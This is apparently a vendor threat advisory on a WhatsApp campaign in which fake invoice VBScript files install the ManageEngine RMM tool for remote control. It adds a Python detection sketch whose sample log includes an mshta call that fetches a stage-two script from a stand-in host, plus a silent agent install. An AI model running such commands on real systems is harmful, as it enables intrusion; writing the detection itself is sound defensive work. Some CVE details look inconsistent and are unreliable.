Executive Summary
In June 2026, a sophisticated phishing campaign was identified targeting users of WhatsApp Desktop and WhatsApp Web across multiple countries, including Malaysia, Brazil, India, Mexico, Singapore, the U.K., Spain, Taiwan, and Australia. Attackers utilized compromised WhatsApp accounts to distribute malicious Visual Basic Script (VBScript) files disguised as legitimate business documents, such as invoices and billing statements. Upon execution, these scripts installed ManageEngine Endpoint Central, a legitimate Remote Monitoring and Management (RMM) tool, granting attackers full remote control over the victim's system. This unauthorized access enabled the exfiltration of sensitive data, installation of additional malware, and potential lateral movement within corporate networks.
This incident underscores a concerning trend in cyber threats where attackers leverage legitimate software tools to evade detection and maintain persistent access within compromised systems. The use of social engineering tactics, such as distributing malware through trusted communication platforms like WhatsApp, highlights the evolving nature of phishing campaigns and the necessity for organizations to enhance their security awareness training and implement robust endpoint protection measures.
Why This Matters Now
The exploitation of trusted communication platforms and legitimate software tools in cyber attacks is on the rise, posing significant challenges for detection and prevention. Organizations must prioritize comprehensive security strategies, including user education and advanced threat detection capabilities, to mitigate the risks associated with such sophisticated phishing campaigns.
Attack Path Analysis
Attackers initiated the campaign by sending malicious VBScript files via WhatsApp messages, leading to the installation of ManageEngine RMM software. The VBScript executed with elevated privileges, allowing the installation of the RMM tool. The RMM software provided attackers with remote access, enabling lateral movement within the network. Attackers established command and control through the RMM tool, maintaining persistent access. Sensitive data was exfiltrated using the RMM software's capabilities. The attack concluded with potential disruption or further exploitation of compromised systems.
Kill Chain Progression
Initial Compromise
Description
Attackers sent malicious VBScript files via WhatsApp messages, leading to the installation of ManageEngine RMM software.
Related CVEs
CVE-2022-27908
CVSS 8.8
An SQL injection vulnerability in ManageEngine RMM Central allows remote attackers to execute arbitrary SQL commands via the 'bview' parameter in reports.
Affected Products:
Zoho ManageEngine RMM Central – <= 10.1.23
Exploit Status:
proof of concept
CVE-2022-29535
CVSS 9.8
An SQL injection vulnerability in ManageEngine RMM Central allows remote attackers to execute arbitrary SQL commands via the 'bview' parameter in reports.
Affected Products:
Zoho ManageEngine RMM Central – <= 10.1.23
Exploit Status:
proof of concept
CVE-2024-5466
CVSS 8.8
A code injection vulnerability in ManageEngine RMM Central allows authenticated users with write permissions to Deploy Agent to execute arbitrary code.
Affected Products:
Zoho ManageEngine RMM Central – <= 128329
Exploit Status:
no public exploit
MITRE ATT&CK® Techniques
Spearphishing Attachment
Command and Scripting Interpreter: Visual Basic
System Binary Proxy Execution: Mshta
Software Deployment Tools
Ingress Tool Transfer
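The attack path and the ATT&CK techniques above describe a chain that is visible in endpoint process-creation telemetry: a messaging client spawning a Windows script host on a .vbs file, that script host proxying execution through mshta.exe, and an RMM agent being installed by something other than the organisation's sanctioned deployment tool. The following detection sketch is an added example, not code from the original advisory or from any vendor named on this page; the JSON-lines event format, its field names (`image`, `parent_image`, `cmdline`, ...), the installer file name and every sample event are constructed for illustration, and the list of approved deployment tools is an assumption an organisation would fill in from its own inventory.

```python
"""
Detection sketch for the WhatsApp -> VBScript -> RMM-install chain.
Added example: not code from the advisory or from any vendor it names.
Event format and all sample lines below are constructed (Sysmon-like
field names assumed); ATT&CK technique IDs in the rule names are real.
"""
import json
from typing import Dict, List, Set

# Constructed process-creation events, one JSON object per line.
# Lines 1-3 are the malicious chain on FIN-PC07; line 4 is a benign
# PDF opened from the same messaging client; line 5 is an approved
# RMM rollout driven by the SCCM client (CcmExec.exe).
SAMPLE_LOG = r"""
{"ts": "2026-06-03T09:12:40Z", "host": "FIN-PC07", "user": "alice", "pid": 4120, "parent_image": "C:\\Users\\alice\\AppData\\Local\\WhatsApp\\WhatsApp.exe", "image": "C:\\Windows\\System32\\wscript.exe", "cmdline": "wscript.exe \"C:\\Users\\alice\\Downloads\\Invoice_June_2026.vbs\""}
{"ts": "2026-06-03T09:12:43Z", "host": "FIN-PC07", "user": "alice", "pid": 4188, "parent_image": "C:\\Windows\\System32\\wscript.exe", "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta.exe https://example.invalid/stage2.hta"}
{"ts": "2026-06-03T09:12:51Z", "host": "FIN-PC07", "user": "alice", "pid": 4230, "parent_image": "C:\\Windows\\System32\\wscript.exe", "image": "C:\\Windows\\System32\\msiexec.exe", "cmdline": "msiexec.exe /i C:\\Users\\alice\\AppData\\Local\\Temp\\ManageEngine_agent.msi /qn"}
{"ts": "2026-06-03T09:15:02Z", "host": "FIN-PC07", "user": "alice", "pid": 4310, "parent_image": "C:\\Users\\alice\\AppData\\Local\\WhatsApp\\WhatsApp.exe", "image": "C:\\Program Files\\Adobe\\Acrobat\\Acrobat.exe", "cmdline": "Acrobat.exe \"C:\\Users\\alice\\Downloads\\quote.pdf\""}
{"ts": "2026-06-03T10:01:12Z", "host": "IT-ADMIN02", "user": "svc-deploy", "pid": 880, "parent_image": "C:\\Windows\\CCM\\CcmExec.exe", "image": "C:\\Windows\\System32\\msiexec.exe", "cmdline": "msiexec.exe /i C:\\Windows\\ccmcache\\ManageEngine_agent.msi /qn"}
"""

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}      # T1059.005 execution vehicle
MESSAGING_CLIENTS = {"whatsapp.exe"}               # delivery channel from the advisory
INSTALLERS = {"msiexec.exe"}
RMM_MARKERS = ("manageengine", "endpoint central")  # substrings in an install command line
# Assumption: tools this organisation allows to push RMM agents (fill from inventory).
APPROVED_DEPLOYERS = {"ccmexec.exe"}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> List[Dict]:
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def classify(ev: Dict) -> List[str]:
    """Return the rule names a single process-creation event trips."""
    image = basename(ev["image"])
    parent = basename(ev["parent_image"])
    cmd = ev["cmdline"].lower()
    hits = []
    # T1566.001 + T1059.005: a script host running a .vbs handed over by a chat client.
    if image in SCRIPT_HOSTS and parent in MESSAGING_CLIENTS and ".vbs" in cmd:
        hits.append("vbs_from_messaging_client")
    # T1218.005: mshta.exe spawned by a script host rather than by a user shell.
    if image == "mshta.exe" and parent in SCRIPT_HOSTS:
        hits.append("mshta_from_script_host")
    # T1072 / T1105: an RMM agent install not driven by an approved deployment tool.
    if image in INSTALLERS and any(m in cmd for m in RMM_MARKERS) and parent not in APPROVED_DEPLOYERS:
        hits.append("rmm_install_unapproved")
    return hits


def detect(text: str) -> List[Dict]:
    """Run every rule over every event; one alert per (event, rule) pair."""
    alerts = []
    for ev in parse_events(text):
        for rule in classify(ev):
            alerts.append({"ts": ev["ts"], "host": ev["host"], "pid": ev["pid"], "rule": rule})
    return alerts


def chained_hosts(alerts: List[Dict]) -> Set[str]:
    """Hosts showing both ends of the chain: script-from-chat AND an unapproved RMM install."""
    by_host: Dict[str, Set[str]] = {}
    for a in alerts:
        by_host.setdefault(a["host"], set()).add(a["rule"])
    return {h for h, rules in by_host.items()
            if {"vbs_from_messaging_client", "rmm_install_unapproved"} <= rules}


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for a in found:
        print(f'{a["ts"]} {a["host"]} pid={a["pid"]} {a["rule"]}')
    print("full chain observed on:", sorted(chained_hosts(found)))
```

The single-event rules are deliberately narrow (parent process plus image plus command-line content) so that a user opening a PDF from the same chat client, or the sanctioned deployment tool installing the same agent, produces no alert; the host-level correlation in `chained_hosts` is what separates one suspicious process from the full kill chain the advisory describes and is the condition worth paging on.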
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Ensure all system components and software are protected from known vulnerabilities by installing applicable vendor-supplied security patches.
Control ID: 6.2
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA ZTMM 2.0 – Identity and Access Management
Control ID: 3.1
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Financial Services
WhatsApp VBScript RAT deployment threatens financial communications, triggering compliance violations under PCI DSS and HIPAA while enabling lateral movement through encrypted channels.
Health Care / Life Sciences
ManageEngine RMM tool installation via WhatsApp creates HIPAA violations, enables patient data exfiltration through unencrypted traffic and compromises medical device communications.
Information Technology/IT
The VBScript campaign abusing WhatsApp Desktop targets IT infrastructure, enabling privilege escalation, lateral movement, and command and control through legitimate RMM tools across multi-cloud environments.
Government Administration
RAT deployment through WhatsApp messaging compromises government communications, enables data exfiltration that bypasses egress controls, and undermines implementation of NIST compliance frameworks.
Sources
- WhatsApp VBScript Campaign Uses Fake Documents to Install ManageEngine RMM Tool – https://thehackernews.com/2026/06/whatsapp-vbscript-campaign-uses-fake.html
- Malicious VBScript Sent via WhatsApp Installs ManageEngine RMM Agent – https://www.mallory.ai/stories/019eef02-602a-7ae1-a74e-c3fbcb9a7783
- WhatsApp VBS Malware Installs Remote Access Tool – https://howtofix.guide/whatsapp-vbs-malware-fake-documents-rmm/
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Aviatrix Zero Trust CNSF is pertinent to this incident as it would likely limit the attacker's ability to move laterally and exfiltrate data by enforcing strict segmentation and controlled egress policies.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: The initial compromise may not be directly prevented by CNSF, but subsequent malicious activities could be constrained.
Control: Zero Trust Segmentation
Mitigation: Even with elevated privileges, the attacker's ability to access other workloads would likely be limited.
Control: East-West Traffic Security
Mitigation: Lateral movement within the network would likely be constrained, reducing the attacker's ability to access additional systems.
Control: Multicloud Visibility & Control
Mitigation: Establishing and maintaining command and control channels would likely be more challenging due to enhanced monitoring.
Control: Egress Security & Policy Enforcement
Mitigation: Data exfiltration attempts would likely be detected and blocked, reducing the risk of data loss.
The overall impact of the attack would likely be limited, reducing potential disruption and exploitation.
Impact at a Glance
Affected Business Functions
- IT Operations
- Network Management
- Endpoint Security
Estimated downtime: 3 days
Estimated loss: $50,000
Potential exposure of sensitive business documents and financial data.
Recommended Actions
Key Takeaways & Next Steps
- Implement Zero Trust Segmentation to restrict lateral movement and limit the spread of threats within the network.
- Deploy Egress Security & Policy Enforcement to monitor and control outbound traffic, preventing unauthorized data exfiltration.
- Utilize Threat Detection & Anomaly Response systems to identify and respond to malicious activities promptly.
- Enforce East-West Traffic Security to detect and prevent unauthorized internal communications.
- Ensure Multicloud Visibility & Control to maintain comprehensive oversight of network activities across all environments.